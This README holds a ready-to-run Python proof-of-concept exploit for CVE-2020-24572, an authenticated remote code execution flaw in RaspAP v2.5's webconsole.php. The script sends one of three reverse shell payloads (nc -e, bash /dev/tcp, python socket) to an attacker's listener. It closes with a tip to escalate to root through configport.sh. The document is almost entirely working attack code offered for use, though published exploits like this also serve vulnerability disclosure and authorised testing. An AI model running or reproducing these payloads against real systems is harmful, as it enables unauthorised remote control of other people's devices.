README.md
Rendering markdown...
#/usr/bin/python3
#####################################################
### Proof of Concept for CVE-2020-24572 ###
### (Authenticated) Remote Code Execution ###
### via Webconsole.php in ###
### RaspAP v2.5 ###
### github.com/billz/raspap-webgui ###
### github.com/nickola/web-console ###
#####################################################
### Re-Written by: gerberop Date:03/31/2021 ###
#####################################################
### Credit: lunchb0x - Disc. Date: 08/24/2020 ###
#####################################################
### github.com/gerberop/CVE-2020-24572 ###
#####################################################
import os
import sys
import requests
from termcolor import colored
if len(sys.argv) != 7:
print("-------------------------------------------------------------------------------------------------")
print("USAGE: rasp_pwn.py [target_ip] [port] [attacker_ip] [attacker_port] [RaspAP_admin_pass] [payload]")
print("-------------------------------------------------------------------------------------------------")
print("Payload options: \n1. nc reverse shell\n2. bash reverse shell\n3. python reverse shell")
print("-------------------------------------------------------------------------------------------------")
exit(1)
target = sys.argv[1]
port = sys.argv[2]
listener_ip = sys.argv[3]
listener_port = sys.argv[4]
raspap_user = "admin"
raspap_pass = sys.argv[5]
payload = sys.argv[6]
if payload == '1':
cmd = f"nc -e /bin/bash {listener_ip} {listener_port}"
elif payload == '2':
cmd = f"/bin/bash -c 'bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1'"
elif payload == '3':
cmd = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_ip}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
session = requests.Session()
session.auth = (raspap_user, raspap_pass)
json_req_1 = {
"jsonrpc":"2.0",
"method":"run",
"params":["NO_LOGIN",
{"user":"","hostname":"","path":""},
f"{cmd}"
],
"id":6
}
print(colored("[!]", 'green') + f" Using Reverse Shell: {cmd}")
print(colored("[!]", 'yellow') + " Sending activation request - Make sure your listener is running . . .")
input(colored("[>>>]", 'green')+" Press ENTER to continue . . .")
os.system("stty echo")
print(colored("\n[!]", 'green') + " You should have a shell :)")
print(colored("\n[!]", 'red') + " Remember to check sudo -l to see if you can get root through /etc/raspap/lighttpd/configport.sh")
os.system("stty echo")
r = session.post("http://%s:%s/includes/webconsole.php"%(target,port), json=json_req_1)
print(colored("[*]", 'green') + " Done.")